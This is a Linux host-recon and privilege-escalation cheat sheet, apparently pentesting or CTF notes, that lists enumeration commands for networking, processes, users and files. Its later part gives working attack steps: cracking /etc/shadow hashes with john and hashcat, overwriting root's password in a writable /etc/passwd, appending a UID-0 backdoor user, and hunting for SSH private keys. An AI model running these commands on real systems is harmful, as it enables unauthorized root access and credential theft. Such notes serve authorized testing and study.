Host Recon
Help
# List available commands
compgen -c | sort | less
compgen -a | sort | less
# Help for a specified command
man <command>
<command> --help
Networking
General networking information, such as interfaces, IP addresses, and DNS:
ip addr show
ip a
ifconfig -a # deprecated
# Show interfaces
ip link show
Check recent communications via the ARP table:
ip route
ip neigh
List active TCP and UDP connections:
ss -tulnp
netstat -tulnp # deprecated
List recent and persistent routes:
ip route show
ip r
route -n # legacy
System
pspy can be used on the target to enumerate real-time system information!
# General system information
neofetch
hostnamectl
uname -a
# Name of the host
hostname
# Kernel version & distro info
uname -r
cat /etc/os-release
# Terminal history file
cat ~/.bash_history
cat ~/.zsh_history
history
# Environment variables
printenv
env
# Named pipes
ls -l /proc/sys/fs/pipe-max-size
lsof
# sudo version
sudo --version
# Installed packages
# Debian / Ubuntu (APT-based)
dpkg -l
apt list --installed
# RedHat / CentOS / Fedora (RPM-based)
rpm -qa
dnf list installed
yum list installed
# Arch Linux / Manjaro (Pacman)
pacman -Q
# Snap packages
snap list
# Flatpak packages
flatpak list
# Homebrew (macOS or Linux)
brew list --versions
# List running processes
ps aux
# List the PID and the full command used to start the process
ps -eo pid,cmd
# List root processes
ps -u root -o pid,comm
# Information about a specific process
ps -p <PID> -f
cat /proc/<PID>/status
# List services
systemctl
# Check for service files for user x7331
systemctl status x7331
# Check the process status
systemctl status ssh
Users & Groups
# Current user
whoami
# List current user's privileges
sudo -l
# List current user's information
id
getent passwd $(whoami)
# List local users
cut -d: -f1 /etc/passwd
getent passwd
# List active (logged-on) users
who
# Elevated permissions
sudo -l
# List current user's groups
groups
id -Gn
# List local groups
getent group
# List group members
getent group <group>
# Check which files the group has permissions on
find / -group filter 2>/dev/null
Files
# List all files (including hidden files)
ls -la
# Include subdirectories
ls -laR
# Search for a specific file
locate local.txt
find / -type f -name "local.txt" 2>/dev/null
# Exclude a single directory
find / -path /proc -prune -o -writable -print 2>/dev/null
# Exclude multiple directories
find / \( -path /proc -o -path /var/www \) -prune -o -writable -print 2>/dev/null
# Case-insensitive search
find / -type f -iname "local.txt" 2>/dev/null
# Recursive scan
grep -riH "password" /path/to/directory
find / -type f -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
Capabilities split root privileges into discrete actions that can be independently assigned to processes or binaries. This allows granting only the necessary permissions—such as overriding file ownership or binding to privileged ports—without giving full root access.
getcap -r / 2>/dev/null
Check permissions:
ls -l /etc/shadow
If it is writable, create/modify a user:
# Generate a new password hash
openssl passwd -1 -salt xyz newpassword
# Replace root's password with the new one
echo 'root:$1$xyz$YOUR_GENERATED_HASH' | chpasswd -e
# Switch to root
su - root
If it is readable, copy shadow and passwd locally and crack them:
# Unshadow files
unshadow passwd shadow > hashes.txt
# Crack with john
john --wordlist=rockyou.txt hashes.txt
# Crack with hashcat
hashcat -m1800 hashes rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Check the file's permissions:
ls -l /etc/passwd
If it is writable, root's password can be changed:
# Generate a new hash
openssl passwd -1 -salt evil password123
# Place the hash between the first and second ':' of root
sed -i 's/^root:[^:]*:/root:$1$evil$F9LZzU/LJjH7ZQZzJX.Zn1:/' /etc/passwd
# Switch user
sudo su
Or, a new root user can be created:
# Append a new user entry
echo "newroot:\$1\$evil\$F9LZzU/LJjH7ZQZzJX.Zn1:0:0:root:/root:/bin/bash" >> /etc/passwd
# Switch user
su newroot
$ sudo find /home -name "id_rsa" -o -name "id_dsa"
Scheduled Jobs
# Print jobs
crontab -l
cat /etc/crontab
cat /var/log/syslog | grep "CRON"